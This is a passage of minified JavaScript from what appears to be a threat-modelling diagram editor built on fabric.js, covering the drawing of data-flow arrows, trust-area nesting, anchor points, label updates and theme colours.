0===n||n.subscribe(Re=>this.flowChangeLineType(te.ID,Re)),null===(r=te.ArrowPosChanged)||void 0===r||r.subscribe(Re=>this.flowUpdateFlowArrow(te.ID)),null===(c=te.BendFlowChanged)||void 0===c||c.subscribe(Re=>this.flowChangeBending(te.ID,Re)),null===(d=te.DirectionChanged)||void 0===d||d.subscribe(Re=>this.flowChangeDirection(te.ID)),null===(T=te.AnchorChanged)||void 0===T||T.subscribe(Re=>this.flowChangeAnchor(te.ID,Re)),this.Diagram.Elements.AddChild(te),te.Sender=this.getViewBaseElement(this.tmpFlowLineEndpoint[ot.ID]),te.Receiver=this.getViewBaseElement(q[ot.ID]),pe[ot.fa1]=this.tmpFlowLine[ot.fa1],pe[ot.fe1]=this.tmpFlowLineEndpoint[ot.canvasID],this.tmpFlowLineEndpoint[ot.dfs]||(this.tmpFlowLineEndpoint[ot.dfs]=[]),this.tmpFlowLineEndpoint[ot.dfs].push(pe[ot.canvasID]),pe[ot.fa2]=k,pe[ot.fe2]=q[ot.canvasID],q[ot.dfs]||(q[ot.dfs]=[]),q[ot.dfs].push(pe[ot.canvasID]),this.tmpFlowLineEndpoint=null,this.Canvas.remove(this.tmpFlowLine),this.tmpFlowLine=null,this.Canvas.requestRenderAll(),this.setFlowSelected(pe,!0),this.SelectionChanged.emit(te),this.onCanvasModified()}}}}deleteElement(e){if(null==e)return;let i=null,n=this.Canvas.getObjects().find(r=>r[ot.ID]==e);if(n){if((n[ot.elementTypeID]==Et.DataFlow||n[ot.flowID])&&(i=n[ot.elementTypeID]==Et.DataFlow?n:this.getCanvasElementByCanvasID(n[ot.flowID])),i?(this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.p0ID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.p1ID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.p2ID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.arrowEID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.arrowSID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.textID])),this.Canvas.getObjects().filter(c=>null!=c[ot.dfs]).forEach(c=>{const d=c[ot.dfs].indexOf(i[ot.canvasID]);d>=0&&c[ot.dfs].splice(d,1)}),this.Canvas.remove(i)):(n._objects&&n._objects.filter(c=>"group"==c.type).forEach(c=>this.Canvas.remove(c)),this.Canvas.remove(n)),n[ot.t0ID]){const c=this.getCanvasElementByCanvasID(n[ot.t0ID]);c&&this.Canvas.remove(c)}let r=this.getViewBaseElement(e);r&&this.instanceOfElementType(r)&&(r.Parent.DeleteChild(r),this.Canvas.getObjects().filter(c=>c[ot.ID]==e).forEach(c=>{this.Canvas.remove(c),this.Diagram.Elements.DeleteChild(r)})),r instanceof Ou&&this.NavTreeChanged.emit(),this.onCanvasModified()}}setFlowSelected(e,i){var n,r,c;let d=i?1:0;if(this.seletedFlow){let T=this.seletedFlow;this.seletedFlow=null,this.setFlowSelected(T,!1)}if(e){this.seletedFlow=e,null===(n=this.getCanvasElementByCanvasID(e[ot.p0ID]))||void 0===n||n.set("opacity",d);let T=this.getViewBaseElement(e[ot.ID]);(0==d||this.instanceOfCanvasFlow(T)&&T.BendFlow)&&(null===(r=this.getCanvasElementByCanvasID(e[ot.p1ID]))||void 0===r||r.set("opacity",d)),i&&this.getCanvasElementByCanvasID(e[ot.p1ID])&&this.Canvas.bringToFront(this.getCanvasElementByCanvasID(e[ot.p1ID])),null===(c=this.getCanvasElementByCanvasID(e[ot.p2ID]))||void 0===c||c.set("opacity",d),this.Canvas.requestRenderAll()}}createFlow(e,i,n,r,c){let d=e,T=i,k=n-e,q=r-i;const Y=Math.PI/2-Math.acos(k/Math.sqrt(k*k+q*q)),te=this.BendFlow?50:0,pe=k/2+Math.sign(q)*te*Math.cos(Y),Re=q/2-te*Math.sin(Y);let Fe=null;this.instanceOfCanvasFlow(c)?Fe=c:console.error("Element is not a flow object",c);let Ne=["M",d.toString(),T.toString(),"q",pe.toString(),Re.toString(),k.toString(),q.toString()].join(" "),et=new Ei.fabric.Path(Ne,{fill:"",stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,objectCaching:!1,canvasID:Fo(),selectable:!0,lockMovementX:!0,lockMovementY:!0,lockScalingX:!0,lockScalingY:!0,hasBorders:!1,transparentCorners:!0,cornerColor:"transparent",ID:c.ID,elementTypeID:Et.DataFlow,myType:wt.DataFlowLine,bendFlow:this.BendFlow,perPixelTargetFind:!0});et.setControlsVisibility({mtr:!1,mts:!1});let ut=this.flowCreateText(e,i,n,r,e+pe,i+Re,c.GetProperty("Name"));ut[ot.visible]=Fe.ShowName,et[ot.textID]=ut[ot.canvasID],ut[ot.flowID]=et[ot.canvasID];let Ze=new Ei.fabric.Path("M 15 0 L 10 5 L 10 -5 z",{fill:this.StrokeColor,stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,objectCaching:!1,originX:"center",originY:"center",canvasID:Fo(),selectable:!1,myType:wt.DataFlowArrowE});Ze.setControlsVisibility({mtr:!1,mts:!1}),et[ot.arrowEID]=Ze[ot.canvasID],Ze[ot.flowID]=et[ot.canvasID],Ze[ot.visible]=Fe.ArrowPos!=wn.Start;let yt=new Ei.fabric.Path("M 15 0 L 10 5 L 10 -5 z",{fill:Fe.ArrowPos==wn.Both?this.StrokeColor:this.BackgroundColor,stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,objectCaching:!1,originX:"center",originY:"center",canvasID:Fo(),selectable:!1,myType:wt.DataFlowArrowS});yt.setControlsVisibility({mtr:!1,mts:!1}),et[ot.arrowSID]=yt[ot.canvasID],yt[ot.flowID]=et[ot.canvasID],yt[ot.visible]=Fe.ArrowPos!=wn.End;let It=this.flowCreateCurvePoint("p1",et.path[1][1],et.path[1][2],et);et[ot.p1ID]=It[ot.canvasID],It[ot.flowID]=et[ot.canvasID],It[ot.visible]=this.BendFlow;let St=this.flowCreateCurveCircle("p0",et.path[0][1],et.path[0][2],et);et[ot.p0ID]=St[ot.canvasID],St[ot.flowID]=et[ot.canvasID];let Nt=this.flowCreateCurveCircle("p2",et.path[1][3],et.path[1][4],et);return et[ot.p2ID]=Nt[ot.canvasID],Nt[ot.flowID]=et[ot.canvasID],this.Canvas.add(et),this.Canvas.add(Ze),this.Canvas.add(yt),this.Canvas.add(ut),this.Canvas.add(It),this.Canvas.add(St),this.Canvas.add(Nt),this.Canvas.sendToBack(ut),this.Canvas.bringToFront(It),setTimeout(()=>{this.flowUpdateFlowArrow(c.ID)},100),et}flowCreateCurveCircle(e,i,n,r){var c=new Ei.fabric.Circle({left:i,top:n,radius:6.5,stroke:this.theme.Primary,fill:this.theme.Primary,originX:"center",originY:"center",name:e,canvasID:Fo(),myType:wt.DataFlowCircle,selectable:!1,hasBorders:!1,hasControls:!1});return c[ot.flowID]=r[ot.canvasID],c.setControlsVisibility({mtr:!1,mts:!1}),c}flowCreateCurvePoint(e,i,n,r){var c=new Ei.fabric.Circle({left:i,top:n,radius:7,stroke:this.theme.Primary,fill:this.theme.Primary,originX:"center",originY:"center",name:e,canvasID:Fo(),myType:wt.DataFlowPoint,selectable:!0,hasBorders:!1,hasControls:!1});return c[ot.flowID]=r[ot.canvasID],c.setControlsVisibility({mtr:!1,mts:!1}),c}flowCreateText(e,i,n,r,c,d,T){let k=e,q=i,Y=n-e,te=r-i,pe=c-k,Re=d-q;const Fe=Math.PI/2-Math.acos(Y/Math.sqrt(Y*Y+te*te));let Ne=pe<0?pe*Math.PI/4:0;Y<Ne&&(Ne=Y);let et=Re<0?Re*Math.PI/4:0;te<et&&(et=te);let ut=10,Ze=Math.cos(Fe),yt=Math.sin(Fe),It="left";Y<0&&te<0?(Ze*=-1,yt*=-1,It="right",ut=15):Y<0?(Ze*=1,yt*=-1,It="right",ut=15):te<0?(Ze*=-1,yt*=-1):(Ze*=1,yt*=-1),Ze*=ut,yt*=ut;let St=["M",(k+Math.cos(Fe)*ut).toString(),(q-Math.sin(Fe)*ut).toString(),"q",pe.toString(),Re.toString(),Y.toString(),te.toString()].join(" "),Nt=new Ei.fabric.Text(T,{left:k+Ne+Ze,top:q+et+yt,textAlign:"center",charSpacing:-50,path:new Ei.fabric.Path(St,{strokeWidth:1,visible:!1}),pathSide:It,pathStartOffset:0,fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,canvasID:Fo(),selectable:!0,perPixelTargetFind:!0,targetFindTolerance:4,hasBorders:!1,lockMovementX:!0,lockMovementY:!0,lockScalingX:!0,lockScalingY:!0,transparentCorners:!0,cornerColor:"transparent",myType:wt.ElementName});return Nt.setControlsVisibility({mtr:!1,mts:!1}),Nt}flowUpdateText(e){const i=this.getCanvasElementByCanvasID(e[ot.textID]);this.Canvas.remove(i);const n=this.flowCreateText(e.path[0][1],e.path[0][2],e.path[1][3],e.path[1][4],e.path[1][1],e.path[1][2],i.text);return n.styles=i.styles,n[ot.canvasID]=i[ot.canvasID],n[ot.visible]=i[ot.visible],n[ot.fontSize]=i[ot.fontSize],this.Canvas.add(n),e[ot.textID]=n[ot.canvasID],n[ot.flowID]=e[ot.canvasID],n}flowUpdateFlowArrow(e){if(this.MouseMode==Zs.Move)return;const i=this.getCanvasElementByID(e),n=this.getViewBaseElement(e),r=12;let c=this.getCanvasElementByCanvasID(i[ot.arrowEID]);c.set(ot.visible,[wn.End,wn.Both,wn.Initiator].includes(n.Data.ArrowPos));let d=this.getCanvasElementByCanvasID(i[ot.arrowSID]);if(d.set(ot.visible,[wn.Start,wn.Both,wn.Initiator].includes(n.Data.ArrowPos)),d.set("fill",n.Data.ArrowPos==wn.Initiator?this.BackgroundColor:this.StrokeColor),c[ot.visible]){let T=i.path[1][3]+i.strokeWidth/2,k=i.path[1][4]+i.strokeWidth/2,te=Math.atan2(i.path[1][1]-T,i.path[1][2]-k)+Math.PI;c.set("pathOffset",{x:c.left,y:c.top});let pe=c.path;pe[0][1]=T-r*Math.sin(te-Math.PI/6),pe[0][2]=k-r*Math.cos(te-Math.PI/6),pe[1][1]=T,pe[1][2]=k,pe[2][1]=T-r*Math.sin(te+Math.PI/6),pe[2][2]=k-r*Math.cos(te+Math.PI/6),c.set("path",pe),c.setCoords()}if(d[ot.visible]){let T=i.path[0][1]+i.strokeWidth/2,k=i.path[0][2]+i.strokeWidth/2,te=Math.atan2(i.path[1][1]-T,i.path[1][2]-k)+Math.PI;d.set("pathOffset",{x:d.left,y:d.top});let pe=d.path;pe[0][1]=T-r*Math.sin(te-Math.PI/6),pe[0][2]=k-r*Math.cos(te-Math.PI/6),pe[1][1]=T,pe[1][2]=k,pe[2][1]=T-r*Math.sin(te+Math.PI/6),pe[2][2]=k-r*Math.cos(te+Math.PI/6),d.set("path",pe),d.setCoords()}this.Canvas.requestRenderAll()}flowChangeLineType(e,i){let n=this.Canvas.getObjects().find(r=>r[ot.ID]==e);n&&n[ot.myType]==wt.DataFlowLine&&(i==ed.Dashed?n.set(ot.strokeDashArray,[5,5]):delete n[ot.strokeDashArray]),this.Canvas.requestRenderAll(),this.onCanvasModified()}flowChangeBending(e,i){const n=this.getCanvasElementByID(e);n[ot.bendFlow]=i;let r=this.getCanvasElementByCanvasID(n[ot.p1ID]);if(0==n[ot.bendFlow]){let k=n.path[0][2]+(n.path[1][4]-n.path[0][2])/2;r.left=n.path[1][1]=n.path[0][1]+(n.path[1][3]-n.path[0][1])/2,r.top=n.path[1][2]=k,r.set(ot.visible,!1),r.set(ot.opacity,0)}else{const T=n.path[0][1],k=n.path[0][2];let te=T,pe=k,Re=n.path[1][3]-T,Fe=n.path[1][4]-k;const Ne=Math.PI/2-Math.acos(Re/Math.sqrt(Re*Re+Fe*Fe)),et=50,ut=Re/2+Math.sign(Fe)*et*Math.cos(Ne),Ze=Fe/2-et*Math.sin(Ne);r.left=n.path[1][1]=te+ut,r.top=n.path[1][2]=pe+Ze,r.set(ot.visible,!0),r.set(ot.opacity,1)}let c=n._calcDimensions();n.set({width:c.width,height:c.height,left:c.left,top:c.top,pathOffset:{x:c.width/2+c.left,y:c.height/2+c.top},dirty:!0}),n.setCoords();let d=this.getViewBaseElement(n[ot.ID]);this.flowUpdateFlowArrow(d.ID),this.flowUpdateText(n),this.Canvas.requestRenderAll()}flowChangeDirection(e){const i=this.getCanvasElementByID(e),n=this.getViewBaseElement(e),r=this.getFlowAnchorPoint(i[ot.fa2],this.getCanvasElementByCanvasID(i[ot.fe2])),c=this.getFlowAnchorPoint(i[ot.fa1],this.getCanvasElementByCanvasID(i[ot.fe1])),d=this.createFlow(r[0],r[1],c[0],c[1],n);d[ot.fa1]=i[ot.fa2],d[ot.fe1]=i[ot.fe2],d[ot.fa2]=i[ot.fa1],d[ot.fe2]=i[ot.fe1],this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.p0ID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.p1ID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.p2ID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.arrowEID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.arrowSID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.textID])),[ot.ID,ot.elementTypeID,ot.myType,ot.strokeDashArray,ot.bendFlow,ot.fontSize].forEach(q=>{d.set(q,i[q])});const k=i[ot.canvasID];this.getCanvasElementByCanvasID(d[ot.arrowSID])[ot.flowID]=k,this.getCanvasElementByCanvasID(d[ot.arrowEID])[ot.flowID]=k,this.getCanvasElementByCanvasID(d[ot.p0ID])[ot.flowID]=k,this.getCanvasElementByCanvasID(d[ot.p1ID])[ot.flowID]=k,this.getCanvasElementByCanvasID(d[ot.p2ID])[ot.flowID]=k,d[ot.canvasID]=k,this.Canvas.remove(i),this.flowChangeBending(n.ID,n.BendFlow),this.flowUpdateText(d),this.flowUpdateFlowArrow(n.ID),this.Canvas.requestRenderAll(),this.setFlowSelected(d,!0),this.SelectionChanged.emit(n),this.onCanvasModified()}flowChangeAnchor(e,i){const n=this.getCanvasElementByID(e);n[ot.fa+i.o]=i.fa,this.onMovingObject(this.getCanvasElementByCanvasID(n["fe"+i.o]))}dfOnPointMoving(e){let i=this.getCanvasElementByCanvasID(e[ot.flowID]);"p1"==e.name&&(i.path[1][1]=e.left,i.path[1][2]=e.top);let n=i._calcDimensions();i.set({width:n.width,height:n.height,left:n.left,top:n.top,pathOffset:{x:n.width/2+n.left,y:n.height/2+n.top},dirty:!0}),i.setCoords(),this.flowUpdateFlowArrow(i[ot.ID]),this.flowUpdateText(i)}createFlowAnchors(e,i,n=!0,r=!0,c=!1,d=!1){if(this.Diagram.DiagramType==xn.Hardware)return[];let T=6.5,k=13,Y=[];const te=(pe,Re,Fe)=>{let Ne=new Ei.fabric.Circle({left:pe,top:Re,radius:T,fill:this.StrokeColor,opacity:.15});const et=pe+T,ut=Re+T,Ze=4.33;let yt=new Ei.fabric.Line([et-Ze,ut-Ze,et+Ze,ut+Ze],{stroke:this.theme.Primary,selectable:!1}),It=new Ei.fabric.Line([et-Ze,ut+Ze,et+Ze,ut-Ze],{stroke:this.theme.Primary,selectable:!1});return new Ei.fabric.Group([Ne,yt,It],{left:pe,top:Re,hasControls:!1,hasBorders:!1,lockRotation:!0,opacity:0,fa:Fe,myType:wt.FlowAnchor,canvasID:Fo()})};return n&&(Y.push(te(e-k-3,i/2-T,_i.East)),Y.push(te(T,i/2-T,_i.West))),r&&(Y.push(te(e/2-T,T,_i.North)),Y.push(te(e/2-T,i-k-3,_i.South))),c&&(Y.push(te(e-k-3,i/4-T,_i.EasternNorth)),Y.push(te(e-k-3,3*i/4-T,_i.EasternSouth)),Y.push(te(T,i/4-T,_i.WesternNorth)),Y.push(te(T,3*i/4-T,_i.WesternSouth)),Y.push(te(3*e/4-T,T,_i.NorthernEast)),Y.push(te(e/4-T,T,_i.NorthernWest)),Y.push(te(3*e/4-T,i-k-3,_i.SouthernEast)),Y.push(te(e/4-T,i-k-3,_i.SouthernWest))),d&&(Y.push(te(e-k-3,T,_i.NorthEast)),Y.push(te(T,T,_i.NorthWest)),Y.push(te(e-k-3,i-k-3,_i.SouthEast)),Y.push(te(T,i-k-3,_i.SouthWest))),Y.forEach(pe=>{pe.on("mousedown",Re=>{this.onFlowAnchorHit(Re)})}),Y}getFlowAnchorPoint(e,i){return e==_i.North?[i.left+i.width/2,i.top]:e==_i.East?i[ot.elementTypeID]==Et.PhysicalLink?[i.left+i.width-i.width/14,i.top+i.height/2]:[i.left+i.width,i.top+i.height/2]:e==_i.South?[i.left+i.width/2,i.top+i.height]:e==_i.West?i[ot.elementTypeID]==Et.PhysicalLink?[i.left+i.width/14,i.top+i.height/2]:[i.left,i.top+i.height/2]:e==_i.NorthernEast?[i.left+3*i.width/4,i.top]:e==_i.NorthernWest?[i.left+i.width/4,i.top]:e==_i.SouthernEast?[i.left+3*i.width/4,i.top+i.height]:e==_i.SouthernWest?[i.left+i.width/4,i.top+i.height]:e==_i.EasternNorth?[i.left+i.width,i.top+i.height/4]:e==_i.EasternSouth?[i.left+i.width,i.top+3*i.height/4]:e==_i.WesternNorth?[i.left,i.top+i.height/4]:e==_i.WesternSouth?[i.left,i.top+3*i.height/4]:e==_i.NorthEast?[i.left+i.width,i.top]:e==_i.NorthWest?[i.left,i.top]:e==_i.SouthEast?[i.left+i.width,i.top+i.height]:e==_i.SouthWest?[i.left,i.top+i.height]:null}textOnMovingPoint(e){let i=this.getCanvasElementByCanvasID(e[ot.textObjID]);if(!i)return void this.Canvas.remove(e);let n=i._objects.find(r=>r[ot.myType]==wt.ElementName);n.set("left",e.left-(i.left+i.width/2)),n.set("top",e.top-(i.top+i.height/2-8)),this.Canvas.requestRenderAll()}textOnMovingText(e){let i=this.getCanvasElementByCanvasID(e[ot.t0ID]),n=e._objects.find(r=>r[ot.myType]==wt.ElementName);i.set("left",e.left+e.width/2+n.left),i.set("top",e.top+e.height/2+n.top-8),this.Canvas.requestRenderAll()}onScaleElement(e){let i=e.transform.target,n=i._objects.find(pe=>pe[ot.myType]==wt.ElementType),r=i._objects.find(pe=>pe[ot.myType]==wt.ElementPhyElement),d=(i._objects.find(pe=>pe[ot.myType]==wt.ElementName),i.width*i.scaleX),T=i.height*i.scaleY;i.set({height:T,width:d,scaleX:1,scaleY:1}),n&&n.set({left:0,top:-T/2+5}),r&&r.set({left:0,top:T/2-15});let k=i._objects.filter(pe=>null!=pe[ot.fa]),q=6.5,Y=13;k.forEach(pe=>{pe[ot.fa]==_i.East?pe.set({left:d/2-Y-6,top:-q}):pe[ot.fa]==_i.West?pe.set({left:-d/2+q,top:-q}):pe[ot.fa]==_i.North?pe.set({left:-q,top:-T/2+q}):pe[ot.fa]==_i.South?pe.set({left:-q,top:T/2-Y-6}):pe[ot.fa]==_i.EasternNorth?pe.set({left:d/2-Y-6,top:-T/4}):pe[ot.fa]==_i.EasternSouth?pe.set({left:d/2-Y-6,top:T/4-Y}):pe[ot.fa]==_i.WesternNorth?pe.set({left:-d/2+q,top:-T/4}):pe[ot.fa]==_i.WesternSouth?pe.set({left:-d/2+q,top:T/4-Y}):pe[ot.fa]==_i.NorthernEast?pe.set({left:d/4-Y,top:-T/2+q}):pe[ot.fa]==_i.NorthernWest?pe.set({left:-d/4,top:-T/2+q}):pe[ot.fa]==_i.SouthernEast?pe.set({left:d/4-Y,top:T/2-Y-6}):pe[ot.fa]==_i.SouthernWest?pe.set({left:-d/4,top:T/2-Y-6}):pe[ot.fa]==_i.NorthEast?pe.set({left:d/2-Y-6,top:-T/2+q}):pe[ot.fa]==_i.NorthWest?pe.set({left:-d/2+6,top:-T/2+q}):pe[ot.fa]==_i.SouthEast?pe.set({left:d/2-Y-6,top:T/2-Y-6}):pe[ot.fa]==_i.SouthWest&&pe.set({left:-d/2+6,top:T/2-Y-6}),pe.setCoords()})}fireScaling(e){e.fire("scaling",{transform:{target:e}})}getCanvasElementByID(e){return this.Canvas.getObjects().find(i=>i[ot.ID]==e)}getCanvasElementByCanvasID(e){return this.Canvas.getObjects().find(i=>i[ot.canvasID]==e)}changeObjectType(e,i){let n=this.Canvas.getObjects().find(r=>r[ot.ID]==e);if(n._objects){let r=n._objects.find(c=>c[ot.myType]==wt.ElementType);r&&(r.text="\xab"+i+"\xbb",n.dirty=!0,this.Canvas.requestRenderAll(),this.onCanvasModified())}else if(n[ot.textID]){let r=this.getCanvasElementByCanvasID(n[ot.textID]);r.text="\xab"+i+"\xbb",r.dirty=!0,this.Canvas.requestRenderAll(),this.onCanvasModified()}}changeObjectPhysicalElement(e,i){const n=this.Canvas.getObjects().find(r=>r[ot.ID]==e);if(n._objects){let r=n._objects.find(c=>c[ot.myType]==wt.ElementPhyElement);if(r)r.text=i?i.GetProperty("Name"):"",n.dirty=!0,this.Canvas.requestRenderAll(),this.onCanvasModified();else{const c=new Ei.fabric.Text(i?i.GetProperty("Name"):"",{fontSize:this.currentFontSizeConfig.Type,fill:this.theme.Primary,originX:"center",left:0,top:n.height/2-15,myType:wt.ElementPhyElement});n[ot.elementTypeID]==Et.LogTrustArea&&(c[ot.originX]="left",c[ot.originY]="top",c.set({left:-n.width/2+5,top:-n.height/2+35})),n.add(c),this.Canvas.requestRenderAll(),this.onCanvasModified()}}else if(n[ot.textID]){let r=this.getCanvasElementByCanvasID(n[ot.textID]);r.text=i?i.GetProperty("Name"):"",r.dirty=!0,this.Canvas.requestRenderAll(),this.onCanvasModified()}}changeObjectName(e){var i;let n=this.getCanvasElementByID(e),r=this.getViewBaseElement(e),c=null;if(n._objects?c=n._objects.find(d=>d[ot.myType]==wt.ElementName):n[ot.myType]==wt.DataFlowLine&&(c=this.Canvas.getObjects().find(d=>d[ot.myType]==wt.ElementName&&d[ot.flowID]==n[ot.canvasID])),c&&r){if(c.text=null!=r.Ref?r.Ref.NameRaw:r.NameRaw,r instanceof M2||r instanceof rs){if(r.FlowType==Xs.Extend?c.text="\xabextend\xbb":r.FlowType==Xs.Include&&(c.text="\xabinclude\xbb"),c.styles&&delete c.styles[0],r instanceof rs&&r.ShowProtocolDetails){if((null===(i=r.ProtocolStack)||void 0===i?void 0:i.length)>0&&(c.text=c.text+" ("+r.ProtocolStack.map(d=>d.NameRaw).join(", ")+")"),r.SenderInterface){c.text=r.SenderInterface.Name+": "+c.text,(!c.styles||!c.styles[0])&&(c.styles={0:{}});for(let d=0;d<r.SenderInterface.Name.length;d++)c.styles[0][d]={fill:this.theme.Primary}}if(r.ReceiverInterface){c.text=c.text+" :"+r.ReceiverInterface.Name,(!c.styles||!c.styles[0])&&(c.styles={0:{}});for(let d=c.text.length-r.ReceiverInterface.Name.length;d<c.text.length;d++)c.styles[0][d]={fill:this.theme.Primary}}}c=this.flowUpdateText(n),c.set(ot.visible,null==r.Data.ShowName||r.Data.ShowName)}else{let d;d=r instanceof td||r instanceof zm||r instanceof Ts||r instanceof Bg?r.Ref.GetProperties().find(T=>"Name"==T.ID):r.GetProperties().find(T=>"Name"==T.ID),d.Type==Ii.TextArea&&c.set("top",-c.height/2)}c.set("dirty",!0),this.Canvas.requestRenderAll()}}changeObjectBorder(e){const i=this.getCanvasElementByID(e),n=this.getViewBaseElement(e);let r=null;i._objects?r=i._objects.find(c=>c[ot.myType]==wt.ElementBorder):i[ot.myType]==wt.DataFlowLine&&(r=i),r&&n&&(n.OutOfScope?r.set("strokeDashArray",[2,2]):i[ot.myType]==wt.TrustArea?r.set("strokeDashArray",[10,5]):delete r.strokeDashArray,r.set("dirty",!0),this.Canvas.requestRenderAll())}changeFontSize(){this.Canvas.getObjects().forEach(e=>{let i=null,n=null,r=null;e._objects?(i=e._objects.find(c=>c[ot.myType]==wt.ElementType),r=e._objects.find(c=>c[ot.myType]==wt.ElementPhyElement),n=e._objects.find(c=>c[ot.myType]==wt.ElementName)):e[ot.myType]==wt.DataFlowLine&&(n=this.getCanvasElementByCanvasID(e[ot.textID])),n&&n.set(ot.fontSize,e[ot.myType]!=wt.TrustArea?this.currentFontSizeConfig.Name:this.currentFontSizeConfig.Type),i&&i.set(ot.fontSize,this.currentFontSizeConfig.Type),r&&r.set(ot.fontSize,this.currentFontSizeConfig.Type)}),this.Canvas.requestRenderAll(),this.onCanvasModified()}renderIcon(e,i,n,r,c){e.save(),e.translate(i,n),e.rotate(Ei.fabric.util.degreesToRadians(c.angle));let k=document.createElement("img");k.src="data:image/svg+xml,%3C%3Fxml version='1.0' encoding='utf-8'%3F%3E%3C!DOCTYPE svg PUBLIC '-//W3C//DTD SVG 1.1//EN' 'http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd'%3E%3Csvg version='1.1' id='Ebene_1' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x='0px' y='0px' width='595.275px' height='595.275px' viewBox='200 215 230 470' xml:space='preserve'%3E%3Ccircle style='fill:%23F44336;' cx='299.76' cy='439.067' r='218.516'/%3E%3Cg%3E%3Crect x='267.162' y='307.978' transform='matrix(0.7071 -0.7071 0.7071 0.7071 -222.6202 340.6915)' style='fill:white;' width='65.545' height='262.18'/%3E%3Crect x='266.988' y='308.153' transform='matrix(0.7071 0.7071 -0.7071 0.7071 398.3889 -83.3116)' style='fill:white;' width='65.544' height='262.179'/%3E%3C/g%3E%3C/svg%3E",e.drawImage(k,-12,-12,24,24),e.restore()}checkIntersection(){this.blockCheckingIntersection||(this.blockCheckingIntersection=!0,setTimeout(()=>{this.intersectionPairs.forEach(n=>n[2]=0);let e=[],i=this.Canvas.getObjects();for(let n=0;n<i.length;n++)for(let r=n;r<i.length;r++){let c=i[n],d=i[r];if(c[ot.ID]!=d[ot.ID]&&c.intersectsWithObject(d)){let T=Y=>Y[ot.elementTypeID]==Et.LogTrustArea||Y[ot.elementTypeID]==Et.PhyTrustArea,k=null,q=null;T(c)&&T(d)?c.width*c.height>d.width*d.height?(k=c,q=d):(k=d,q=c):T(c)?(k=c,q=d):T(d)&&(k=d,q=c),k&&(e.some(Y=>Y.key==q)||e.push({key:q,value:[]}),e.find(Y=>Y.key==q).value.push(k))}}e.forEach(n=>{let r=n.value[0];n.value.length>1&&(r=n.value.find(d=>d.width*d.height==Math.min(...n.value.map(T=>T.width*T.height))));let c=this.getViewBaseElement(r[ot.ID]);if(c&&this.instanceOfContainer(c)){let d=this.getViewBaseElement(n.key[ot.ID]);if(d){c.AddChild(d);const T=this.intersectionPairs.find(k=>k[0][ot.ID]==r[ot.ID]&&k[1][ot.ID]==n.key[ot.ID]);T?T[2]=1:this.intersectionPairs.push([r,n.key,1])}}});for(let n=0;n<this.intersectionPairs.length;n++){let r=this.intersectionPairs[n];if(0==r[2]){let c=this.getViewBaseElement(r[0][ot.ID]),d=this.getViewBaseElement(r[1][ot.ID]);c&&d&&this.instanceOfContainer(c)&&(null==c.Root&&console.log("Root is null"),c.Root.AddChild(d),this.intersectionPairs.splice(n,1),n--)}}this.blockCheckingIntersection=!1},1e3))}getCanvasSize(){let e=Number.MAX_VALUE,i=Number.MIN_VALUE,n=Number.MAX_VALUE,r=Number.MIN_VALUE;return this.Canvas.getObjects().forEach(c=>{c[ot.myType]!=wt.GridLine&&(c.aCoords.tl.x<e&&(e=c.aCoords.tl.x),c.aCoords.br.x>i&&(i=c.aCoords.br.x),c.aCoords.tl.y<n&&(n=c.aCoords.tl.y),c.aCoords.br.y>r&&(r=c.aCoords.br.y))}),e-=5,n-=5,i+=5,r+=5,this.xMax=i,this.yMax=r,[e,n,i,r]}setCanvasColor(){if(this.Canvas.backgroundColor!=this.BackgroundColor){this.Canvas.backgroundColor=this.BackgroundColor,Ei.fabric.Object.prototype.cornerColor=this.StrokeColor;let e=n=>{if(n.stroke&&n.stroke!=this.theme.Primary&&n.set("stroke",this.StrokeColor),n.fill&&n.fill!=this.theme.Primary){let r="";"white"==n.fill?r="black":"black"==n.fill||"rgb(0,0,0)"==n.fill?r="white":"transparent"==n.fill?r=n.fill:n.fill==t.BackgroundColorDark?r=t.BackgroundColorLight:n.fill==t.BackgroundColorLight?r=t.BackgroundColorDark:console.log("obj fill",n.fill),n.set("fill",r)}if(n.cornerColor&&n.cornerColor!=this.theme.Primary){let r="";"transparent"==n.cornerColor?r="transparent":"white"==n.cornerColor?r="black":"black"==n.cornerColor?r="white":console.log("cornerColor",n.cornerColor),n.set("cornerColor",r)}},i=n=>{n.forEach(r=>{e(r),r._objects&&i(r._objects)})};i(this.Canvas.getObjects()),this.Canvas.renderAll()}}instanceOfCanvasFlow(e){return e instanceof rs||e instanceof M2}instanceOfContainer(e){return e instanceof zm||e instanceof Ys||e instanceof sf}instanceOfElementType(e){return e instanceof os||e instanceof lc}}return t.BackgroundColorDark="#1E1E1E",t.BackgroundColorLight="#FFFFFF",t.GridSize=20,t})();class $T extends D2{CopyElement(){this.SelectedElement instanceof td||this.SelectedElement instanceof zm||this.SelectedElement instanceof rs||(this.copyID=this.SelectedElement.ID)}PasteElement(){if(!this.copyID)return;const a=this.getViewBaseElement(this.copyID),e=this.getCanvasElementByID(this.copyID);if(a){const i=this.createElement({stencilRef:{name:"",stencilID:a.GetProperty("Type").ID}},e.left+e.width+10,e.top);i.CopyFrom(a.Data),i.Name+="-Copy";const n=this.getCanvasElementByID(i.ID);n.set("width",e.width),n.set("height",e.height),this.fireScaling(n),this.copyID=null}}initializeCanvas(a){var e;if(!super.initializeCanvas(a))return!1;if(!this.Diagram.Canvas&&this.Diagram.DiagramType==xn.Hardware){let i=this.dataService.Config.GetStencilTypes().find(c=>c.ElementTypeID==Et.PhyTrustArea&&"Device Casing"==c.Name);i||(i=this.dataService.Config.GetStencilTypes().find(c=>c.IsDefault&&c.ElementTypeID==Et.PhyTrustArea));const n=this.createElement({stencilRef:{name:"",stencilID:i.ID}},5,5);let 